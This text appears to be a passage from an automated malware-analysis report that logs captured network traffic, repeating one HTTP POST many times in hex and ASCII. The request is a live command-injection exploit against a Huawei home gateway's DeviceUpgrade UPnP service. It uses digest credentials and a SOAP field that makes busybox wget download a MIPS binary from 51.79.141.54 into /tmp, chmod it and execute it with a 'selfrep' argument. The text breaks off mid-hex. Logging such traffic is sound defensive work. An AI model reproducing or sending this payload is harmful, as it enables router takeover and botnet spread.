61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 